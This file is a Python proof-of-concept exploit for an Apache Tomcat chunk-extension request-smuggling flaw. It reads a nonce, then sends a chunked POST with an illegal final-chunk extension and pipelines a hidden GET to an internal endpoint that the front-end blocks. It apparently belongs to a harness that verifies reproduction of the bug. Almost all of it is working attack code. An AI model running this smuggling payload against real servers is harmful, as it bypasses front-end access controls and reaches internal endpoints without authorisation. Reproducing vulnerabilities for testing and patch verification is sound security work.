#!/usr/bin/env python3
"""
CVE-2026-24880 — Apache Tomcat ChunkedInputFilter chunk-extension request smuggling.

Drives the vulnerable front-end -> back-end path:

  1. Reads the fresh per-boot nonce from the sanctioned endpoint GET /public/nonce
     (value-agnostic: the nonce is learned at runtime, never baked in).
  2. Sends ONE outer request `POST /public/ingest` with a chunked body whose final
     (size 0) chunk carries an RFC-illegal chunk-extension (`;ext=/x`). The vulnerable
     ChunkedInputFilter swallows the extension bytes without validation; a fixed
     ChunkedInputFilter (9.0.116+) rejects the '/' via its ChunkExtension state machine
     and 400s the whole request.
  3. Immediately pipelines a smuggled inner request
        GET /internal/arrival?nonce=<nonce> HTTP/1.1
     right after the terminating CRLF of the chunked body. The byte-pump front-end
     forwards the body verbatim; on the vulnerable back-end the outer chunked request
     completes and the inner request is re-parsed by Tomcat as an independent request,
     reaching /internal/arrival — an endpoint the front-end refuses to forward as an
     outer request (403). The back-end then appends "ARRIVAL <nonce>" to its arrival log.

The script does NOT verify success; it only triggers the bug and prints what it sent
and what the back-end returned on the wire. The verifier confirms the arrival
out-of-band.

Usage:
    python3 smuggle.py <host> <port>
"""

import socket
import sys


def read_nonce(host, port):
    """Fetch the per-boot nonce from ``GET /public/nonce``.

    Opens a fresh connection, sends a ``Connection: close`` request and reads
    until the peer closes the socket.

    Args:
        host: Host name or address to connect to.
        port: TCP port to connect to.

    Returns:
        The response body, de-chunked when the response declares a chunked
        ``Transfer-Encoding``, decoded as latin-1 and stripped of surrounding
        whitespace. Returns ``""`` when no header/body separator was received.

    Raises:
        OSError: On connect/send/receive failure, including ``socket.timeout``
            when the peer is silent for 10 seconds.
    """
    req = (
        "GET /public/nonce HTTP/1.1\r\n"
        "Host: x\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()

    received = []
    # The context manager closes the socket even when sendall()/recv() raises.
    # The 10 s timeout given to create_connection() also applies to every
    # later send/recv on the returned socket.
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(req)
        while True:
            d = s.recv(4096)
            if not d:
                break
            received.append(d)
    data = b"".join(received)

    head, sep, body = data.partition(b"\r\n\r\n")
    if not sep:
        return ""

    # When the response is chunked, decode the body to recover the raw nonce
    # (do not treat the chunk-size line as the value). Header lines are parsed
    # individually so that optional whitespace around the colon and codings
    # listed before "chunked" are tolerated.
    for line in head.split(b"\r\n")[1:]:  # [0] is the status line
        name, colon, value = line.partition(b":")
        if (
            colon
            and name.strip().lower() == b"transfer-encoding"
            and b"chunked" in value.lower()
        ):
            body = dechunk(body)
            break
    return body.decode("latin-1").strip()


def dechunk(body):
    """Decode an HTTP/1.1 chunked message body, best effort.

    Args:
        body: Raw bytes following the response header block.

    Returns:
        The concatenated chunk data as bytes. Decoding stops silently at the
        terminating zero-size chunk, at the first chunk-size line that is
        missing, empty or not plain hexadecimal, or at the end of the input.
        A final chunk that is shorter than its declared size is returned as
        far as it goes. Trailers are ignored.
    """
    hex_digits = b"0123456789abcdefABCDEF"
    parts = []
    pos = 0
    while pos < len(body):
        eol = body.find(b"\r\n", pos)
        if eol == -1:
            break
        # Drop any chunk-extension (";name=value") before parsing the size.
        size_field = body[pos:eol].split(b";", 1)[0].strip()
        # int(x, 16) alone also accepts signs, "0x" prefixes and underscores.
        # A negative size would move the cursor backwards and could loop
        # forever, so only plain hex digits are accepted.
        if not size_field or any(c not in hex_digits for c in size_field):
            break
        size = int(size_field, 16)
        if size == 0:
            break
        start = eol + 2
        parts.append(body[start:start + size])
        pos = start + size + 2  # skip chunk data + trailing CRLF
    return b"".join(parts)


def smuggle(host, port, nonce):
    """Send the outer chunked POST with the smuggled inner GET pipelined behind it.

    The wire bytes are, in order: the ``POST /public/ingest`` header block, a
    single terminating chunk ``0;ext=/x`` followed by the empty trailer line,
    and then ``GET /internal/arrival?nonce=<nonce>``. The exact bytes are
    echoed to stderr before sending.

    Args:
        host: Host name or address to connect to.
        port: TCP port to connect to.
        nonce: Value placed verbatim in the inner request's ``nonce`` query
            parameter.

    Returns:
        Every byte received on the connection until the peer closes it, stays
        silent for 6 seconds, or resets the connection.

    Raises:
        OSError: On connect or send failure.
    """
    # Inner (smuggled) request — reachable ONLY via the chunk-extension bug.
    inner = (
        "GET /internal/arrival?nonce=" + nonce + " HTTP/1.1\r\n"
        "Host: x\r\n"
        "\r\n"
    )
    # Outer benign request. Final chunk size 0 with an RFC-illegal chunk-extension.
    # The '/' in the extension value is swallowed by the VULNERABLE parser but
    # rejected by the FIXED ChunkExtension state machine (-> 400 on a patched build).
    outer = (
        "POST /public/ingest HTTP/1.1\r\n"
        "Host: x\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    body = "0;ext=/x\r\n\r\n"
    wire = outer.encode() + body.encode() + inner.encode()

    sys.stderr.write("[*] wire bytes sent to %s:%s:\n%r\n" % (host, port, wire))

    received = []
    # The context manager closes the socket on every exit path.
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(wire)
        s.settimeout(6)
        try:
            while True:
                d = s.recv(4096)
                if not d:
                    break
                received.append(d)
        except socket.timeout:
            # keep-alive connection may stay open after both responses; that's fine.
            pass
        except ConnectionResetError:
            # A peer that closes while pipelined request bytes are still
            # unread can surface here as a reset. Keep what already arrived
            # instead of losing it to a traceback.
            sys.stderr.write(
                "[*] connection reset by peer; returning bytes received so far\n"
            )
    return b"".join(received)


def main():
    """Command-line entry point: ``smuggle.py <host> <port>``.

    Reads the nonce via ``read_nonce``, fires the smuggling request via
    ``smuggle`` and prints the repr of the raw response bytes to stdout.
    Progress and error messages go to stderr.

    Exit status:
        2 — wrong argument count, or a port that is not an integer in 1..65535.
        1 — the nonce could not be read, or a network error occurred.
    """
    if len(sys.argv) != 3:
        sys.stderr.write("usage: smuggle.py <host> <port>\n")
        sys.exit(2)
    host = sys.argv[1]
    # Reject a malformed port with a usage error rather than a traceback.
    try:
        port = int(sys.argv[2])
    except ValueError:
        port = -1
    if not 0 < port < 65536:
        sys.stderr.write("[!] invalid port: %r\n" % sys.argv[2])
        sys.stderr.write("usage: smuggle.py <host> <port>\n")
        sys.exit(2)

    try:
        nonce = read_nonce(host, port)
    except OSError as exc:
        sys.stderr.write("[!] failed to read nonce from /public/nonce: %s\n" % exc)
        sys.exit(1)
    if not nonce:
        sys.stderr.write("[!] failed to read nonce from /public/nonce\n")
        sys.exit(1)
    sys.stderr.write("[*] fresh boot nonce read from /public/nonce: %s\n" % nonce)

    try:
        resp = smuggle(host, port, nonce)
    except OSError as exc:
        sys.stderr.write("[!] smuggle request failed: %s\n" % exc)
        sys.exit(1)
    sys.stdout.write("[*] back-end response bytes on the connection:\n")
    sys.stdout.write(repr(resp) + "\n")

# Run main() only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
